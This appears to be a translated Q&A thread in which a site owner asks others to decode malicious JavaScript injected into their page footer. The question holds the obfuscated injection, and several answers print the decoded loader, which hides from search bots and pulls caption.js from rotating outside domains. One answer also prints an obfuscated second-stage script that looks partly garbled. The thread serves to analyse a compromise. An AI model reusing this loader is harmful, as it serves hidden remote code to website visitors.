解碼一些注入的Javascript？

Question

我曾將以下內容注入到我的網站頁腳，爲了解決更大的謎題（「發生了什麼」），我試圖對其進行解碼。有任何想法嗎？

下面的代碼：

<ads><script type="text/javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%3D%3D%2D%31%26%26%21%61%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%62%29%26%26%63%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%29%7B%76%61%72%20%64%3D%5B%22%6D%79%61%64%73%2E%6E%61%6D%65%22%2C%22%61%64%73%6E%65%74%2E%62%69%7A%22%2C%22%74%6F%6F%6C%62%61%72%63%6F%6D%2E%6F%72%67%22%2C%22%6D%79%62%61%72%2E%75%73%22%2C%22%66%72%65%65%61%64%2E%6E%61%6D%65%22%5D%2C%65%3D%5B%22%76%61%67%69%2E%22%2C%22%76%61%69%6E%2E%22%2C%22%76%61%6C%65%2E%22%2C%22%76%61%72%73%2E%22%2C%22%76%61%72%79%2E%22%2C%22%76%61%73%61%2E%22%2C%22%76%61%75%74%2E%22%2C%22%76%61%76%73%2E%22%2C%22%76%69%6E%79%2E%22%2C%22%76%69%6F%6C%2E%22%2C%22%76%72%6F%77%2E%22%2C%22%76%75%67%73%2E%22%2C%22%76%75%6C%6E%2E%22%5D%2C%66%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%64%2E%6C%65%6E%67%74%68%29%2C%67%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%65%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%39%30%37%32%45%34%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%68%6F%6C%79%63%6F%6F%6B%69%65%3D%22%2B%65%73%63%61%70%65%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%73%79%73%74%65%6D%2F%63%61%70%74%69%6F%6E%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));</script></ads> 

Answer 1

可以使用this tool字符串解碼。將字符串轉換選項設置爲URL和解碼。然後你可以用js beautifier。

因爲我很好奇，我看了一下輸出。它正在從一個半隨機域向您的頁面寫入一個新的caption.js文件。有2個用於構建完整域的URL段數組，所以我會說你有一些事情要做。

Answer 2

所有這些數字都是ASCII字符的十六進制值。當unescape被調用時，它們變成真正的角色。例如％3C是'<'。

爲什麼不使用一個消息框來顯示UNESCAPE（...）

Answer 3

<script language="javascript" type="text/javascript"> 
var a = window.navigator.userAgent, 
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i, 
    c = navigator.appVersion; 
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) { 
    var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"], 
     e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."], 
     f = Math.floor(Math.random() * d.length), 
     g = Math.floor(Math.random() * e.length); 
    dt = new Date; 
    dt.setTime(dt.getTime() + 9072E4); 
    document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/"; 
    document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>') 
}; 
</script> 

這樣的輸出，預先考慮從e（如vagi.）爲域名的子域從d（如myads.name）和從該域加載來自/system/caption.js的腳本（例如http://vagi.myads.name/system/caption.js）。

Answer 4

你可以在這裏使用十六進制解碼器： http://home2.paulschou.net/tools/xlate/ 的代碼是

<script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script> 

Answer 5

<script language="javascript" type="text/javascript"> 
var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; 
if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){ 
    var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"], 
    e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."], 
f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length); 
dt=new Date; 
dt.setTime(dt.getTime()+9072E4); 
document.cookie="holycookie="+escape("holycookie")+"; 
expires="+dt.toGMTString()+"; 
path=/"; 
document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')}; 
</script> 

Answer 6

這裏有一個URLDecoder： http://meyerweb.com/eric/tools/dencoder/

和代碼寫入：

<script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script> 

好，所以這不是太有用。它似乎插入另一個JS文件，如果用戶沒有名爲「holycookie」的cookie，而不是谷歌機器人。大部分只是垃圾來選擇哪個域名來獲取有效載荷。

Answer 7

var a = window.navigator.userAgent, 
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i, 
    c = navigator.appVersion; 
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) { 
    var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"], 
     e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."], 
     f = Math.floor(Math.random() * d.length), 
     g = Math.floor(Math.random() * e.length); 
    dt = new Date; 
    dt.setTime(dt.getTime() + 9072E4); 
    document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/"; 
    document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>') 
}; 

代碼正在加載一個隨機的子域s​​ld組合加上不安全的內容。

Answer 8

您發佈的代碼進行解碼，以

var a = window.navigator.userAgent, 
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i, 
    c = navigator.appVersion; 
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) { 
    var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"], 
     e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."], 
     f = Math.floor(Math.random() * d.length), 
     g = Math.floor(Math.random() * e.length); 
    dt = new Date; 
    dt.setTime(dt.getTime() + 9072E4); 
    document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/"; 
    document.write('') 
}; 

這從一個僞隨機的方式組成的URL依次加載代碼提供的，如果條件得到滿足。

如果您打開了，例如http://vain.adsnet.biz/system/caption.js，您將看到以下javascript代碼。

我把解釋給你，但看起來很無害。

function tT() {}; 
var yWP = new Array(); 
tT.prototype = { 
    h: function() { 
     this.i = ""; 
     var nH = function() {}; 
     var tE = 30295; 
     var u = ""; 
     zB = false; 
     this.a = ''; 
     this.eY = 29407; 
     var z = document; 
     vD = "vD"; 
     var gT = "gT"; 
     var oG = ''; 
     var lF = ''; 
     fU = "fU"; 
     var q = function() { 
      return 'q' 
     }; 
     var c = window; 
     var m = function() { 
      return 'm' 
     }; 
     var kS = "kS"; 
     this.b = ""; 
     this.p = 29430; 
     var j = this; 
     dL = ""; 
     var cC = new Date(); 
     cQ = 33459; 
     var uY = "uY"; 
     var vO = function() {}; 
     zN = "zN"; 
     jIZ = ''; 
     var mH = 21601; 
     String.prototype.lP = function (v, hF) { 
      var t = this; 
      return t.replace(v, hF) 
     }; 
     var nA = ""; 
     this.xK = 48622; 
     zG = ""; 
     var kF = function() {}; 

     function aF() {}; 
     var mI = function() {}; 
     var oY = ''; 
     var g = 'sfe?tfTw'.lP(/[wfoj\?]/g, '') + 'irmkeko('.lP(/[\(rO\[k]/g, '') + 'ubty'.lP(/[y\+b\>\)]/g, ''); 
     var iN = new Array(); 
     mJ = "mJ"; 
     aW = "aW"; 
     var hU = "hU"; 
     this.kC = 28044; 
     var k = 'tbr3e*c(r*e3a('.lP(/[\(3b\*G]/g, '') + 'tEe>nat>gaeat)'.lP(/[\)a\>\]\|'.lP(/[\|\)\(MN]/g, '')); 
     var cJ = function() {}; 
     var tX = false; 
     this.xHX = false; 

     function jP() {}; 
     var eZ = 16039; 
     bQ = "bQ"; 
     var eSM = new Date(); 
     c[g](function() { 
      j.h() 
     }, 384); 
     this.xR = ""; 
     var jB = function() { 
      return 'jB' 
     }; 
     var fP = function() { 
      return 'fP' 
     }; 
     var bX = new Array(); 
    } 
    function iLD() {}; 
    var mQ = function() {}; 
    var wZV = "";this.eK = 5506; 
} 
}; 
fO = 30941; 
var hW = new tT(); 
wU = 40956; 
hW.h(); 
hZ = "hZ"; 

你怎麼能自己做到這一點？ URLDecode + jsbeautifier或jsunpack是綽綽有餘了這一步;）

Answer 9

使用PHP函數rawurldecode

<script language="javascript" type="text/javascript"> 
    var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; 
    if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){ 
    var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length); 
    dt=new Date; 
    dt.setTime(dt.getTime()+9072E4); 
    document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; 
    document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')}; 
    </script> 

Answer 10

使用「版本控制」，因此這不會發生在未來。良好的構建完成後，一切都按照您的要求進行，然後在脫機時將其保存到外部硬盤驅動器。

你最近做了些什麼來打亂一個程序員的同事嗎？